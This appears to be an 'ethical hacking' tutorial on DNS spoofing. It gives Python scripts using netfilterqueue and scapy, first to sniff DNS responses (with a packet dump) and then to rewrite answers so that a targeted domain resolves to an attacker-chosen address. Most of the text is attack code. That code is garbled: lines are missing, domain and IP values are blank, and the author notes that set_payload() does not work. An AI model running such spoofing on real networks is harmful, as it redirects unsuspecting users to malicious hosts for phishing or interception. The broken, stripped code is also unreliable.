Python Ethical Hacking - DNS Spoofing
What is DNS Spoofing
Sniff the DNSRR packet and show on the terminal.
- #!/usr/bin/env python
- from netfilterqueue import NetfilterQueue
- from scapy.layers.dns import DNSRR,IP
- def process_packet(packet):
- scapy_packet = IP(packet.get_payload())
- if scapy_packet.haslayer(DNSRR):
- print(
- packet.accept()
- queue = NetfilterQueue()
- queue.bind(0, process_packet)
- try:
- except KeyboardInterrupt:
- print('')
Analyze the following DNSRR records.
- ###[ IP ]###
- version = 4
- ihl = 5
- tos = 0x0
- len = 218
- id = 0
- flags = DF
- frag = 0
- ttl = 64
- proto = udp
- chksum = 0x25e8
- src =
- dst =
- \options \
- ###[ UDP ]###
- sport = domain
- dport = 42647
- len = 198
- chksum = 0x9388
- ###[ DNS ]###
- id = 40073
- qr = 1
- opcode = QUERY
- aa = 0
- tc = 0
- rd = 1
- ra = 1
- z = 0
- ad = 0
- cd = 0
- rcode = ok
- qdcount = 1
- ancount = 3
- nscount = 1
- arcount = 0
- \qd \
- |###[ DNS Question Record ]###
- | qname = ''
- | qtype = AAAA
- | qclass = IN
- \an \
- |###[ DNS Resource Record ]###
- | rrname = ''
- | type = CNAME
- | rclass = IN
- | ttl = 2063
- | rdlen = None
- | rdata = ''
- |###[ DNS Resource Record ]###
- | rrname = ''
- | type = CNAME
- | rclass = IN
- | ttl = 414
- | rdlen = None
- | rdata = ''
- |###[ DNS Resource Record ]###
- | rrname = ''
- | type = CNAME
- | rclass = IN
- | ttl = 38
- | rdlen = None
- | rdata = ''
- \ns \
- |###[ DNS SOA Resource Record ]###
- | rrname = ''
- | type = SOA
- | rclass = IN
- | ttl = 38
- | rdlen = None
- | mname = ''
- | rname = ''
- | serial = 2017032701
- | refresh = 1800
- | retry = 900
- | expire = 2419200
- | minimum = 240
- ar = None
Redirecting DNS Responses
- #!/usr/bin/env python
- from netfilterqueue import NetfilterQueue
- from scapy.layers.dns import *
- def process_packet(packet):
- scapy_packet = IP(packet.get_payload())
- if scapy_packet.haslayer(DNSQR):
- qname = scapy_packet[DNSQR].qname
- if "" in qname.decode(errors='ignore'):
- print("[+] Spoofing target")
- answer = DNSRR(rrname=qname, rdata="")
- scapy_packet[DNS].an = answer
- scapy_packet[DNS].ancount = 1
- del scapy_packet[IP].len
- del scapy_packet[IP].chksum
- del scapy_packet[UDP].chksum
- del scapy_packet[UDP].len
- packet.set_payload(str(scapy_packet).encode())
- packet.accept()
- queue = NetfilterQueue()
- queue.bind(0, process_packet)
- try:
- except KeyboardInterrupt:
- print('')
The set_payload() method does not work....
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